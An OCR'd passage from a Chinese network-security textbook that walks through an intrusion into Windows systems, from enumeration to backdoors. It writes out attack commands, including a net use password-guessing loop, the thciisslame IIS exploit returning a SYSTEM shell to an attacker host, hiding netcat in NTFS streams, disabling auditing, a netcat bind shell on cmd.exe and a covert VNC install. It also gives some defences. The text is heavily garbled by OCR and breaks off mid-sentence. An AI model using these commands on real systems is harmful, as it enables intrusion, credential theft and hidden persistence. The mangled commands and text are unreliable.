3.2.3 EA 


1. 查 点 基本 原理 

通过 扫描 ,入 侵 者 掌握 了 目标 系统 所 使 用 的 操作 系统 ,下 一 步 工作 是 查 点 。 查 点 就 是 搜 
索 特定 系统 上 用 户 和 用 户 组 名 、 路 由 表 、SNMP 信息 、 共 享 资 源 、 服 务 程序 及 旗 标 等 信息 。 
查 点 所 采用 的 技术 依 操 作 系 统 而 定 。 在 Windows 系统 上 主要 采用 的 技术 有 “ 查 点 
NetBIOS” 线 路 、 空 会 话 (NULL Session) „SNMP 代理 和 活动 目录 (Active Directory) 等 。 

Windows 系统 上 主要 有 以 下 工具 。 

(D Windows 系统 命令 。 其 包括 net view、nbtstat .nbtscan 和 nltest。 
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(2) 第 三 方 软件 。 

(D Netviewx(www. ibt. ku. dx/jesper/NetViewx/default. htm) , 
© Userdump( www. hammerofgod. com/download. htm) 。 

(3) User2sid( www. ntbugtraq. com), 

(D GetAcctC www. securityfriday. com) 。 

© DumpSec( www. somarsoft. com) 。 

© Legion www. legionlan. com). 

@ NATCGwww. hackingexposed. com) 。 











图 3-7 NmapWin 扫描 远程 操作 系统 


2. Windows 系统 查 点 


如 果 目 标 探 测 和 勘察 网 络 后 收获 不 大 ,攻击 者 就 会 针对 有 效 的 用 户 账号 或 保护 不 当 的 
共享 资源 下 手 。 从 系统 中 抽出 有 效 账号 或 导出 资源 名 的 过 程 就 称 为 查 点 (Enumeration) 。 

查 点 涉及 去 往 目 标 系统 的 主动 连接 和 定向 查询 。 它 与 具体 操作 系统 密切 相关 , 且 攻 击 
的 重点 在 于 网 络 资源 和 共享 资源 、 用 户 和 用 户 组 、 服 务 程序 及 其 旋 标 。 

CD 旗 标 抓 取 基础 。 旗 标 抓 取 是 查 点 技术 的 基础 , 它 可 以 定义 为 连接 到 远程 应 用 程序 
并 观察 它 的 输出 。 攻 击 者 可 以 识别 目标 系统 上 运行 的 各 项 服务 工作 模型 ,以 便 对 其 潜在 弱 
点 展开 研究 。 一 般 情况 下 ,建立 一 条 到 目标 服务 器 某 已 知 端口 的 Telnet 连接 ,多 按 几 次 
Enter 键 ,就 有 可 能 得 到 以 下 的 返回 信息 : 

C:/> telnet www. corleone. com 80 

HTTP/1.0 400 Bad Request 


Server:Netscape - commerce/1.12 
Your browser sent a non- HTTP complaint message 
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由 此 可 见 ,Telnet 技术 可 用 于 监听 标准 端口 (http/80 .smtp/25 .ftp/21) 的 应 用 服务 。 


(2) 常用 网 络 服务 查 点 。 
Q@ FTP Zi: 


C:/» telnet 192.168.1.250 25 

© SMTP 查 点 : 

C:/» telnet 192.168.1.250 25 

@ NETBOIS NAME SERVICE 查 点 : 


C:V» NET VIEW /DOMAIN( #r ifi] Ji ) 
Domain 


命令 成 功 完 
网 络 截 包 如 图 3-8 所 示 。 





[Source Destination Protocol Length Info 





10.0.0.57 10.0.0.255 BROWSER 216 Get Backup List Request 
10.0.0.92  10.0.0.57 BROWSER 227 Get Backup List Response 











再 查询 某 个 域 中 的 服务 器 : 


C:\> net view /domain:MSHOME 
服务 器 名 称 注释 


\\MSHOME -WDB — 1111 


命令 成 功 完成 。 
网 络 截 包 如 图 3-9 所 示 。 


3-8 利用 NET VIEW 查 点 工具 查 点 一 





Esse. Destination — Pratocel Info 


Session request, to LJ-3c2-wD8«20» from [ — )-39X-1309«00» 
Positive session response 

Negotiate Protocol Request 

Negotiate Protocol Response 

Session Setup Anc Request, NTLMSSP. NEGOTIATE 


Session setup Andx Response, NTLMSSF CHALLENGE, Error: STATUS.MORE. PROCESSING REQUIRED 


Session Setup Andx Request, NTLMSSP AUTM, User: N 
Session setup Andx Response 
Tree connect Andx Request, Path: XNLJ-3C3-WbEMIPCS 


Tree Connect Andx Response 
NetServerEnum2 Request, workstation, Server, SQL Server, Domain controller, Backup Controller, Time source, 
NetserverEnum? Response 
Logoff Ancx Request 
Logoff Ancx Response 
10.0.0.92 Tree pisconnect Request 
10.0.0. 57 Tree pisconnect Response 





图 3-9 利用 NET VIEW 查 点 工具 查 点 二 


(D NBTSTAT 查 点 。Windows 第 二 个 查 点 工具 是 NBTSTAT, 使 用 它 能 够 调 出 某 个 
远程 系统 的 NETBOIS 清单 。 
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C:V> nbtstat — A 10.0.0.57 


Node IpAddress:[10.0.0.57] Scope Id:[] 
NetBIOS Remote Machine Name Table 


Nane 


MSHOME — XXK — 1309 
MSHOME — XXK — 1309 
MSHOME — XXK 
MSHOME — XXK 
MSHOME — XXK 

.. MSBROWSE .. 


«00» 
«20» 
«00» 
«1E» 
«1D» 
«01» 


Type 


Registered 
Registered 
Registered 
Registered 
Registered 
Registered 


MAC Address = B8- AC- 6F- 3E- 3E- 85 


还 能 够 查 出 计算 机 名 、MAC 地 址 .所 在 域名 .已 登录 的 用 户 (03) 正在 运行 的 服务 (1C) 


等 信息 。 


© MSRPC 端点 映射 器 查 点 。MSRPC(MicroSoft Remote Procedure Call) 的 端点 映射 
器 (End Point Mapper) 运 行 在 TCP135 端口 上 。 查 询 该 服务 可 以 获得 目标 主机 上 的 应 用 程 


序 和 相关 信息 。 


C:> Rpcdunp /s /v /i 


ProtSeq:ncacn ip tcp 


Endpoint:1025 
NetOpt: 


Annotation:MS NT Directory DRS Interface 


IsListening:YES 


StringBinding:ncacn ip tcp:65.53.63.15[1025] 
UUID:e3514235 - 4b06 - 11d1 - ab04 - 00c04fc2dcd2 
ComTimeOutValue:RPC C BINDING DEFAULT TIMEOUT 
VersMajor 4 VersMinor 0 


3.2.4 获取 访问 权 
1. 获取 访问 权 基 本 原理 


在 搜集 到 目标 系统 足够 信息 后 ,下 一 步 要 完成 的 工作 自然 是 得 到 目标 系统 的 访问 权 进 
而 完成 对 目标 系统 的 人 侵 。 对 于 Windows 系统 采用 的 主要 技术 有 NetBIOS SMB 口令 猜 
测 ( 包 括 手工 及 字典 猜测 ) 窃听 LM 及 NTLM 认证 散 列 .攻击 HS Web 服务 器 及 远程 溢出 





攻击 。 著 名 的 口令 窃听 工具 有 Sniffer pro, TCPdump. LC4 和 Readsmb, F Ht Mei 





ff 工具 有 


LC4、John the RIPper、NAT、SMBGrind。 对 于 访问 受 限 制 的 服务 ,入 侵 者 便 会 通过 暴力 破 
解 的 方式 获取 访问 权限 。 
2. Windows 系统 获取 访问 权 
1) Windows 独 有 的 组 网 协议 和 服务 
这 些 协议 和 服务 包括 服务 器 信息 块 (SMB) ,微软 远程 过 程 调用 (MSRPC) 和 NetBIOS 
的 相关 服务 ,如 NetBIOS 会 话 服务 、NetBIOS 名 字 解 析 服 务 等 。 这 些 程序 提供 的 应 用 程序 
编程 接口 (APD 可 以 访问 远程 的 Windows 系统 。 
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2) 各 种 因特网 服务 在 Windows 中 的 实现 

大 家 熟悉 的 因特网 协议 ,如 HTTP、SMTP、POP3 和 NNTP 等 协议 及 其 服务 几乎 都 可 
以 在 IIS 中 实现 。 

CD 远程 口令 猜测 。 黑 客 攻 击 Windows 系统 的 方法 是 攻击 文件 和 打印 共享 服务 所 运 
行 的 SMB 协议 。SMB 在 Windows 2000 及 以 后 的 版 本 中 ,除了 使 用 139 号 端口 外 ,还 使 用 
445 号 端口 ,实现 直 连 主机 的 服务 ,其 实质 是 SMB over HTTP 服务 。 当 攻击 者 试 着 连接 一 
个 在 查 点 阶段 发 现 的 共享 卷 ,如 进程 间 通 信 共 享 卷 (IPCS$ ) 或 系统 管理 共享 卷 (C$ ) 时 ,其 
一 定 先 尝试 各 种 用 户 名 /口令 组 合 ,直到 能 进入 目标 系统 为 止 。 

口令 猜测 可 以 使 用 下 列 命令 行 , 其 中 (* ) 表 示 装 入 口令 的 地 方 : 

C:\> net use NN192.168.202.44VIPC$ * /u:Administrator 

Type the password for NN192. 168. 202. 44\ IPC $ : 

The command completed successfully. 

在 本 例 中 ,如 果 由 /给 出 的 Administrator 账户 名 去 连接 目标 系统 而 不 成 功 ,可 以 利用 
DOMAINNaccount 或 MACHINE\ account 去 连接 。 它 们 各 自 的 安全 标识 符 (SID) 是 不 
同 的 。 

攻击 者 可 以 只 猜测 某 服 务 器 或 工作 站 上 的 “本 地 "已 知 账户 的 口令 ,而 不 用 猜测 
Windows 域 控制 器 上 的 全 局 账户 的 口令 ,该 口令 可 能 更 严格 些 。 口 令 猜测 是 有 次 数 限制 
的 ,超过 账户 锁定 阀 值 时 账户 将 被 锁定 。 为 此 ,利用 工具 进行 自动 化 猜测 是 很 有 必要 的 。 

事实 上 ,许多 专用 的 软件 程序 可 以 进行 自动 化 的 口令 猜测 。 例 如 ,legion 工具 可 以 一 次 
扫描 多 个 C 类 IP 地 址 范围 ,以 便 找 出 共享 卷 ,同时 提供 手动 方式 的 字典 攻击 工具 。 此 外 ， 
NAT(NetBIOS Auditing Tool) 和 WindowsInfoScan 都 是 免费 的 命令 行 工具 ,也 能 帮助 攻 
击 者 进行 快速 的 口令 猜测 。 当 然 , 如 果 一 时 找 不 到 工具 ,也 可 以 在 Windows 的 命令 行 窗口 
里 用 FOR 命令 和 标准 的 net use 语法 编写 一 个 简单 的 循环 ,然后 进行 自动 化 口令 猜测 。 

首先 ,创建 一 个 简单 的 用 户 名 (如 Administrator) 和 口令 文件 cred. txt, 具 体 如 下 : 


[File: cred. txt] 


password username 

dies Administrator 
password Administrator 
administrator Administrator 
admin Administrator 


secret Administrator 


注意 ,上 述 文件 使 用 制 表 符 作为 分 隔 符 ,” "为 空 口令 ,其 他 口令 是 常见 的 口令 。 

紧 接着 ,利用 FOR 命令 将 文件 输入 ,具体 如 下 : 

C:V> FOR /F"token- 1,2 +" $i in(cred.txt) do net use \\target\IPC$ %i/u:%j 

上 述 命令 将 把 cred. txt 文件 中 第 一 行 的 第 一 个 记号 赋值 给 变量 %i( 口 令 ) ,第 二 个 记号 
赋值 给 变量 %j( 用 户 名 )。net use 命令 将 使 用 这 两 个 变量 作为 参数 去 尝试 连接 目标 系统 的 
服务 器 共享 卷 。 在 命令 提示 符 处 输入 *FOR /?” 可 以 查看 FOR 命令 的 帮助 信息 。 

为 了 防范 口令 猜测 的 攻击 ,首先 应 当 利 用 防火 墙 安防 手段 ,禁止 或 限制 TCP 的 139 号 
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和 445 号 端口 上 的 SMB 服务 。 其 次 ,可 以 使 用 Windows 的 主机 级 安防 机 制 来 限制 对 SMB 
的 访问 ,其 中 IPSec 过 滤器 只 适用 于 Windows 2000 及 以 上 版 本 ; ICF(Internet Connection 
Firewall) 仅 适用 于 Windows XP、Windows Server 2003 及 以 上 版 本 。 

(2) 针对 TIS 的 攻击 。 针 对 TIS 攻击 手段 几乎 都 以 HS 提供 的 WWW 服务 (HTTP 守护 
进程 ) 为 攻击 目标 ,它们 的 进攻 路 线 主要 有 3 条 , 即 信息 泄露 .目录 遍历 和 缓冲 区 溢出 。 下 面 
介绍 针对 IIS 的 最 新 攻击 手段 。 

1996 年 6 月 ,在 ISM. DLL 中 发 现 第 一 个 缓冲 区 溢出 漏洞 以 来 ,实现 索引 服务 的 
IDA. DLL 和 实现 因特网 打印 协议 的 msw3ptr. dll 等 IIS 功能 模块 里 不 断 发 现 TIS 的 缓冲 区 
溢出 漏洞 。 针 对 此 漏洞 ,微软 公司 在 IIS6 里 禁用 这 些 功能 模块 。 但 是 ,为 电子 商务 提供 保 
护 的 SSL 必须 开放 这 些 功 能 。 

因此 ,微软 公司 在 2004 年 4 月 发 布 的 MS-04-011 安防 公告 承认 ,为 提供 SSL 功能 的 某 
个 函数 库 中 发 现 一 个 与 PCT(Private Communications Transport) 协 议 相 关 的 代码 中 存在 
缓冲 区 溢出 漏洞 。 虽 然 PCT 已 过 时 , 却 给 黑客 留 下 了 攻击 的 立足 点 。 

例如 ,Johnny Cyberpunk 公司 发 布 的 thciisslame. c 程序 ,在 经 过 编译 之 后 ,可 通过 443 
号 端口 攻击 运行 着 TIS 的 Windows 2000 SP4 系统 。 如 能 获得 成 功 ,该 程序 将 把 一 个 以 
system 权限 运行 的 远程 命令 shell 发 送 到 攻击 者 主机 上 的 指定 端口 ,代码 如 下 : 

C:\tools > thcisslame 192.168.234.119 192. 168. 234. 2 1337 

Thciisslame v0. 2- IIS 5.0 SSL remote root exploit 

test on Windows 2000 Server german/English SP4 

by Johnny Cyberpunk ( jcyberpunk@ thc. org) 

[ * ]building buffer 

[ * ]connecting the target 

[ * Jexploit send 

[ * ]waiting for shell 

c: NwindowsNVsystem32 > who am i 

NT AUTHORITY\ SYSTEM 

针对 PCT 缓冲 区 溢出 漏洞 的 补丁 和 具体 操作 可 以 在 微软 公司 的 网 站 找到 。 作 为 应 急 
措施 ,在 Windows Server 2003 中 的 SSL 函数 库存 在 的 缓冲 区 溢出 漏洞 ,可 以 在 注册 表 里 把 
主键 (REG-BINARY 类 型 ,如果 没有 该 键 ,可 以 自己 创建 ) 的 键 值 设置 为 00000000( 禁 用 ): 
[HKEY_LOCAL_MACHINE\System\CurrentControlSet \ Control SecurityProviders V 


SCHANNEIAProtocolsVPCT 1. 0NServerNEnable ] 。 
3.2.5 权限 提升 


1. 权限 提升 基本 原理 

一 旦 攻击 者 通过 前 面 4 步 获得 了 普通 用 户 的 访问 权限 后 ,攻击 者 就 会 试图 将 普通 用 户 
权限 提升 至 超级 用 户 权限 ,以 便 完 成 对 系统 的 完全 控制 。 这 种 从 低级 权限 开始 ,通过 各 种 手 
段 得 到 较 高 权限 的 过 程 称 为 权限 提升 。 权 限 提升 所 采取 的 技术 主要 有 : 通过 得 到 的 口令 文 
件 ,利用 现 有 工具 软件 ,破解 系统 上 其 他 用 户 名 及 口令 ; 利用 不 同 操作 系统 及 服务 的 漏洞 
(Windows 2003 NetDDE 漏洞 ); 利用 管理 员 不 正确 的 系统 配置 等 。 常 用 的 口令 破解 工具 
有 John the RIPper, 得 到 Windows Server 2003 管理 员 权 限 的 工具 有 lc_message、 getadmin, 
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sechole, Invisible Keystroke Logger. 

2. Windows 系统 权限 提升 

攻击 者 利用 交互 登录 权限 在 进入 一 个 Windows 系统 后 , 便 会 对 终极 特权 账户 
Adminstrator 或 System 进行 攻击 。 权 限 提升 是 重要 的 一 环 , 黑 客 采用 网 络 工 具 利用 
Windows 漏洞 进行 攻击 ,以 提升 权限 。 

Netddemsg 工具 利用 网 络 动态 数据 交换 服务 的 漏洞 攻击 Windows 2003, 并 把 权限 提升 
到 System 水 平 ; Debploit 工具 利用 Windows 会 话 管理 器 的 漏洞 进行 攻击 ; Xdebug 工具 利 
用 Windows 内 核 调 试 功能 的 漏洞 实行 攻击 。 对 因特网 的 用 户 来 说 ,攻击 Windows 系统 最 
重要 的 权限 提升 和 进攻 路 线 是 Web 浏览 和 电子 邮件 处 理 。 

从 技术 角度 来 讲 , 获 得 Adminstrator 权限 并 不 等 于 获得 Windows 主机 的 最 高 权限 。 
System 账户 ,也 叫 Local System 或 NT AUTHORITY N SYSTEM 账户 ,其 权限 比 
Adminstrator 账户 还 要 高 。 不 过 ,有 了 Adminstrator 权限 ,就 可 以 利用 Windows 的 计划 任 
务 服务 打开 一 个 命令 shell 去 获得 System 账户 的 权限 。 代 码 如 下 : 


C:\> at 16:33 /INTERACTIVE cmd. exe 


另外 ,www. sysinternals. com 提供 的 psexec 工具 也 允许 远程 获得 和 使 用 System 账户 
的 权限 。 


3.2.6 窃取 


1. 窃取 基本 原理 

一 且 攻 击 者 得 到 了 系统 的 完全 控制 权 , 接 下 来 将 完成 的 工作 是 窃取 , 即 进行 一 些 敏 感 数 
据 的 算 改 、 添 加 、 删 除 及 复制 (如 Windows 系统 的 注册 表 )。 通 过 对 敏感 数据 的 分 析 ,为 进 一 
步 攻 击 应 用 系统 做 准备 。 

2. Windows 系统 窃取 

获得 Adminstrator 权限 后 ,攻击 者 必须 得 到 账户 的 口令 。 在 Windows 系统 中 ,口令 以 
密 文 的 形式 存放 在 安全 账号 管理 器 (Security Accounts Manager,SAM) 中 ,SAM 中 存 有 本 
地 系统 或 域 控制 器 所 控制 范围 内 的 用 户 名 及 其 口令 。 

在 Windows 2003 系统 和 以 后 的 域 控制 器 上 ,口令 密 文 都 存放 在 活动 目录 ( 即 
%windir%WindowsDS\ntds. dit) 中 。 在 默认 安装 的 情况 下 ,ntds. dit 文件 的 大 小 接近 于 
10MB, 目 采用 了 加 密 格式 ,攻击 者 很 难 进行 离线 分 析 。 在 不 是 域 控制 器 的 系统 上 .SAM X: 
件 存放 在 文件 夹 C:\windows\system32\config 中 ,通常 无 法 下 载 ; SAM 备份 文件 存放 在 
文件 夹 C:\windows\repair 中 ,可 以 下 载 。 

攻击 者 破解 SAM 文件 ,按照 以 下 步骤 进行 。 

(1) 用 另 一 种 操作 系统 (如 DOS 系统 的 NTFSDOS 工具 包 ) 启 动 目标 主机 ,把 存放 口令 
密 文 的 文件 复制 到 移动 硬盘 上 。 

(2) 复制 硬盘 修复 工具 包 所 创建 的 SAM 备份 文件 。Windows 的 SAM 备份 文件 存放 
在 文件 夹 C:\windows\repair 中 ,该 文件 被 SYSKEY 加 密 。 

G) 窃听 Windows 系统 的 身份 验证 过 程 。 
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(4) 利用 Pwdump7 工具 提取 口令 密 文 。Pwdump7 工具 可 以 绕 过 SYSKEY 机 制 , 它 利 
用 “DLL 注射 "急速 把 自身 的 代码 加 载 到 另 一 个 高 优先 级 的 进程 空间 ; 然后 发 出 一 个 内 部 
API 调用 去 访问 经 由 SYSKEY 加 密 的 口令 ,而 不 需要 对 它们 进行 破解 。 被 加 载 的 高 优先 级 
进程 是 lsass. exe, 它 是 本 地 安全 管理 子 系统 (Local Security Authority Subsystem, 
LSASS)。 当 Pwdump7 的 代码 “注射 "到 LSASS 的 地 址 空间 和 用 户 上 下 文 时 , 便 能 自动 查 
出 LSASS 的 进程 ID。Pwdump7 可 以 从 TCP 的 139 号 或 445 号 端口 远程 提取 口令 密 文 ， 
但 无 法 攻击 本 地 系统 。 

(5) LOphtcrack 破解 口令 密 文 。SAM 存放 的 用 户口 令 是 经 过 加 密 的 ,其 加 密 算法 为 
IBM LAN Manager(LM) 开 发 的 一 种 散 列 算法 ,脆弱 的 LM 散 列 算法 已 被 逆向 破解 。 微 软 
公司 为 了 保持 与 非 Windows 平台 的 软件 兼容 性 , Windows 2000 及 以 上 的 版 本 也 保留 了 
LM 算法 ,因此 破解 SAM 文件 已 不 是 什么 难事 。 

LM 散 列 算法 的 致命 弱点 是 把 口令 分 成 两 部 分 ,前 7 个 字符 为 一 组 ,后 7 个 字符 为 另 一 
Ab. 这样 ,8 个 字符 的 口令 可 看 成 7 个 字符 的 口令 和 1 个 字符 的 口令 。LOphtcrack THA 
用 这 个 弱点 ,设计 成 同时 破解 一 个 口令 的 两 半 , 就 像 它 们 是 独立 的 口令 一 样 。 

例如 ,以 12 个 字符 的 口令 123456Qwerty 为 例 ,按照 LM 算法 加 密 时 ,首先 转换 成 大 写 
字母 123456QWERTY ,然后 填 上 空格 符 补 齐 , 使 其 成 为 长 度 为 14 个 字符 的 口令 。 在 加 密 
之 前 ,14 个 字符 可 分 为 123456Q 和 WERTY_ 两 部 分 ,两 个 字符 串 被 分 别 加 密 , 加 密 结果 
合并 起 来 就 是 最 终 的 散 列 值 。123456Q 加 密 后 为 6BF11E04AFAB197F, WERTY_ _ 加密 
后 为 1E9FFDCC75575B15, 连 在 一 起 的 散 列 值 为 6BF11E04AFAB197F1E9FFDCC75575B15。 

这 两 半 口 令 任何 一 半 被 攻破 时 , LOphtcrack 就 立即 显示 。 因 此 有 可 能 对 口令 进行 猜 
W: 出 现 WERTY 模式 暗示 口令 选 自 键盘 的 连续 键 构 成 。 由 此 可 以 推断 出 各 种 可 能 性 ,如 
QWERTY-QWERTY.POIUYTQWERTY.ASDFGHQWERTY. YTREWQQWERTY 以 
及 123456QWERTY 这 个 最 终 被 认定 的 口令 。 


3.2.7 掩盖 踪迹 


1. 掩盖 踪迹 基本 原理 

黑客 并 非 踏 雪 无 痕 , 一 旦 黑客 人 侵 系 统 , 必 然 留 下 痕迹 。 此 时 ,黑客 首先 需要 做 的 工作 
就 是 清除 所 有 入 侵 痕迹 ,避免 自己 被 检测 出 来 ,以 便 能 够 随时 返回 被 入 侵 系统 继续 干 坏事 或 
作为 入侵 其 他 系统 的 中 级 跳板 。 掩 盖 踪 迹 的 主要 工作 有 禁止 系统 审计 、 清 空 事件 日 志 、 隐 藏 
作案 工具 及 使 用 人 们 称 为 rootkit 的 工具 组 蔡 换 那些 常用 的 操作 系统 命令 。 常 用 的 清除 系 
统 日 志 工 具有 zap .wzap 和 wted。 

2. Windows 系统 掩盖 踪迹 

攻击 者 取得 Administrator 账号 权限 后 ,不 仅 要 尽快 窃取 目标 系统 的 信息 ,更 想 安 置 几 
个 后 门 程序 .藏匿 一 个 工具 箱 、 禁 止 审计 、 清 空 事件 日 志和 隐藏 文件 ,以 销赃 匿 迹 , 确 保 不 被 
检测 出 来 ,保证 再 次 返回 时 可 安全 行事 ,或 者 将 该 机 作为 桥头 堡 , 以 备 对 其 他 系统 发 动 攻击 
时 可 以 少 做 些 工 作 。 

(1) 关闭 审计 功能 。 利 用 资源 工具 箱 中 的 auditpol 审计 程序 关闭 /打开 (Disable/ 
Enable) 审 计 功 能 易如反掌 。 因 此 ,攻击 者 经 常 是 行事 时 将 审计 关闭 ,离开 目标 系统 前 再 将 
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审计 打开 ,于 是 auditpol 就 保持 不 变 。 

(2) 清理 事件 日 志 。 在 获得 管理 员 权 限 的 过 程 中 ,攻击 者 利用 自己 主机 的 事件 查看 器 
(Event Viewer) 删 除 Windows 事件 日 志 (Event Log) 留 下 的 踪迹 ,但 同时 会 留 下 一 条 新 的 
记录 ,说 明 事件 日 志 已 被 人 侵 者 清空 。 这 样 , 可 能 引起 目标 系统 管理 员 的 警觉 。 如 果 改 用 手 
工 改动 日 志文 件 ,也 不 能 确保 成 功 ,因为 Windows 系统 使 用 的 日 志 语法 比较 复杂 。 

CD 隐藏 文件 。 在 目标 系统 上 保留 一 个 工具 箱 以 供 再 次 人 侵 时 使 用 ,这 就 是 人 侵 者 的 
意愿 。 但 是 ,攻击 者 隐藏 工具 也 不 能 采取 简单 地 改变 文件 属性 的 方法 ,因为 在 资源 管理 器 中 
可 以 用 "显示 所 有 文件 ?选项 显示 隐藏 的 文件 。 

如 果 目 标 系统 使 用 NTFS 文件 系统 , 则 攻击 者 隐藏 文件 的 方法 就 大 不 一 样 。 由 于 
NTFS 允许 单个 文件 中 同时 存在 多 个 信息 * 流 ”, 该 文件 流 机 制 是 “一 种 不 需要 重新 构建 文件 
系统 就 能 给 文件 添加 必要 属性 或 信息 的 机 制 ”, 不 属于 安全 漏洞 。 但 是 ,黑客 却 能 利用 
NTFS 的 分 流 (Streaming) 特 性 藏匿 "工具 箱 ” 文 件 。 例 如 ,把 netcat. exe 作为 信息 流 隐 藏 在 
“winnt\system32\os2” 子 目录 中 的 某 个 文件 中 ,以 待 后 续 攻 击 中 能 使 用 它 。 

CD 为 了 往 文件 中 添加 信息 流 ,可 利用 工具 包 中 的 CP 程序 ,在 目标 文件 名 前 使 用 冒号 指 
定 流 即 可 。 例 如 : 

ciN> cp nc. exe oso001. 009 :nc. exe 

© 上 述 命令 把 nc. exe 隐藏 在 oso001. 009 文件 的 nc. exe 流 中 。 反 之 ,如 果 提 取 nc. exe 
流 , 则 改写 为 : 

c:\> cp oso001. 009 :nc. exe nc. exe 

© 上 述 命令 又 表示 反 分 流出 nc. exe。 选 择 oso001. 009 作为 “前 端 "文件 ,仅仅 因为 它 
相对 模糊 些 。 添 加 文件 后 ,宿主 文件 的 长 度 不 仅 没 有 增加 ,甚至 有 时 还 不 改变 修改 日 期 ,如 
此 的 隐藏 方法 确实 难以 被 发 现 。 清 除 文件 流 的 方法 是 : 先 把 宿主 文件 复制 到 一 个 FAT 分 
区 ,然后 再 复制 回 NTFS 分 区 。 藏 在 宿主 文件 的 文件 流 不 能 以 oso001. 009:nc, exe 方式 执 
行 ,但 可 以 利用 start 命令 执行 : 

Start oso001. 009 :nc. exe 


如 上 所 述 , 针 对 NTFS 文件 流 的 防范 措施 只 能 是 利用 Foundstone 公司 开发 的 Sfind f£ 
序 发 现 被 隐藏 于 NTFS 文件 流 中 的 宿主 文件 ,并 尽快 清除 文件 流 。 


3.2.8 创建 后 门 








1. 创建 后 门 基本 原理 

黑客 的 最 后 一 招 便 是 在 受害 系统 上 创建 一 些 后 门 及 陷阱 ,以 便 入侵 者 一 时 兴起 时 卷 土 
EK ,并 能 以 特权 用 户 的 身份 进入 系统 。 创 建 后 门 的 主要 方法 有 创建 具有 特权 用 户 权限 的 
虚假 用 户 账 号 .安装 批 处 理 .安装 远程 控制 工具 、 使 用 木马 程序 替换 系统 程序 .安装 监控 机 制 
及 感染 启动 文件 等 。 黑 客 常用 的 工具 有 rootkit, sub7, cron, at, Windows 启动 文件 夹 、 
Netcat, VNC, BO2K , secadmin, Invisible Keystroke Logger.remove. exe 等 。 

2. Windows 系统 创建 后 门 

由 于 Windows 系统 缺乏 远程 命令 执行 机 制 , 一 旦 攻击 者 获得 管理 员 权 限 ,入 侵 和 破坏 
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的 大 门 就 打开 了 。 下 面 说 明 攻 击 者 的 攻击 意图 及 其 所 使 用 的 攻击 工具 。 

(D 命令 行 远程 控制 工具 。 具 有 "瑞士 军刀 ”美誉 的 NetCat 工具 软件 ,可 以 被 配置 成 监 
听 某 个 特定 端口 并 在 有 远程 系统 连接 到 该 端口 时 启动 一 个 可 执行 程序 。 如 果 触 发 NetCat 
监听 程序 去 启动 Windows 命令 行 shell, 这 个 shell 就 会 弹 回 到 攻击 者 的 远程 系统 上 。 例 
如 ,以 窃听 模式 启动 NetCat 的 语法 如 下 : 


c:\>nc -L -d -e cmd. exe - p 8080 


其 中 ,-L 表示 连接 多 次 掉 线 时 仍然 坚持 监听 ; -d 表示 NetCat 以 隐秘 方式 运行 ,没有 交互 式 
控制 台 ; -e 表示 指定 执行 的 程序 (如 本 例 的 cmd. exe); -p 表示 指定 监听 端口 (8080) Em 
这 条 命令 将 向 任何 一 个 连接 到 8080 端口 的 攻击 者 返回 一 个 远程 命令 shell, 有 了 shell 攻击 
者 就 可 以 为 所 欲 为 。 

此 外 ,Psexec 工具 ,通过 TCP 的 139 号 或 445 号 端口 访问 SMB 服务 ,也 是 一 个 不 错 的 
选择 。 以 下 列 出 一 条 典型 的 命令 案例 : 


C:\> psexec \\10.1.1.1 -u Administrator -p password  - s cmd. exe 


通过 psexec 执行 各 种 命令 要 比 利 用 AT 命令 更 加 简便 。 

(2) 图 形 化 远程 控制 工具 。 在 Windows 2000 以 上 的 版 本 ,具有 远程 控制 机 制 的 组 件 
TS(Terminal Services) 可 以 控制 远程 主机 。 

另外 ,还 有 一 些 专业 的 第 三 方 图 形 化 远程 控制 工具 ,如 AT&T 公 司 开发 的 优秀 工具 软 
fF. VNCCVirtual Network Computing) ,通过 一 条 连接 控制 远程 主机 。 具 体 过 程 如 下 ， 

O 把 VNC 的 可 执行 程序 和 有 关 文 件 , 如 WINVNC. EXE, VNCHooKS. DLL 和 
OMNITHREAD-RT. DLL 等 复制 到 C:\windows\system32 下 的 某 个 不 易 被 发 现 的 地 方 。 
值得 注意 的 是 , 较 新 的 WINVNC 版 本 会 在 服务 器 启动 时 ,在 系统 托盘 增加 一 个 绿色 的 
图 标 。 

@ 复制 后 需要 设置 一 个 VNC 口令 ,以 便 在 服务 启动 后 、 接 受 外 来 连接 前 的 图 形 对 话 框 
中 输入 该 口令 。 同 时 ,要 求 WINVNC 监听 外 来 连接 ,然后 将 这 些 设置 信息 用 regini. exe f£ 
序 添加 到 远程 目标 系统 的 注册 表 中 ,代码 如 下 : 

C:V>rehini -m NN210.42.224.11 winvnc. ini 

HKEY_USER\. DEFAULTA Sof twareVORLAWinVNC3 

SocketConnect - REG DWORD 0x00000001 

Password = REG BINARY 0x00000008 0x57bf2d2e Ox9e6cb06e 

EX 3 行为 WINVNC.INI 的 文件 , 它 取材 于 一 个 本 地 安装 ,并 用 Windows RK THE 
里 的 Regdmp 程序 导出 一 个 文本 文件 ,其 中 口令 为 二 进 制 值 , 对 应 于 secret。 

@ WINVNC 安装 为 一 项 服务 并 启动 它 。 

以 下 是 远程 系统 上 的 一 个 命令 shell: 

C:V>winvnc - install 

C:V>net start winvnc 

The VNC Server service is starting. 





The VNC Server service was started successfully, 


利用 启动 的 vncviewer 程序 并 连接 目标 系统 ,就 可 以 看 到 目标 IP 地 址 210. 42. 224. 11 
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处 的 0 号 “display” 的 截图 。 随 后 ,远程 桌面 系统 便 有 可 能 出 现 。 
3.2.9 拒绝 服务 攻击 


如 果 黑 客 未 能 成 功 地 获取 了 访问 权 , 那 么 他 们 所 能 采取 最 恶毒 的 手段 便 是 进行 拒绝 服 
务 攻击 , 即 用 漏洞 代码 攻击 系统 使 目标 服务 器 资源 耗 尽 或 资源 过 载 ,以 致 没有 能 力 再 向 外 提 
供 服务 。 攻 击 所 采用 的 技术 主要 是 利用 协议 漏洞 及 不 同系 统 实现 的 漏洞 。 

什么 是 攻击 ? 所 有 试图 破坏 网 络 系统 的 安全 性 的 行为 都 叫做 网 络 攻击 。 入 侵 是 成 功 的 
攻击 。 网 络 攻击 的 方式 分 为 主动 攻击 和 被 动 攻击 ,在 1.2 节 已 详细 介绍 过 。 网 络 攻 击 的 目 
标 分 为 系统 型 攻击 和 数据 型 攻击 ,其 所 对 应 的 安全 性 也 涉及 系统 安全 和 数据 安全 两 个 方面 。 
系统 型 攻击 的 特点 是 : 攻击 发 生 在 网 络 层 ,破坏 系统 的 可 用 性 ,使 系统 不 能 正常 工作 ; 但 
是 ,这 样 一 来 有 可 能 留 下 明显 的 攻击 痕迹 ,用 户 会 发 现 系统 不 能 工作 。 数 据 型 攻击 主要 来 源 
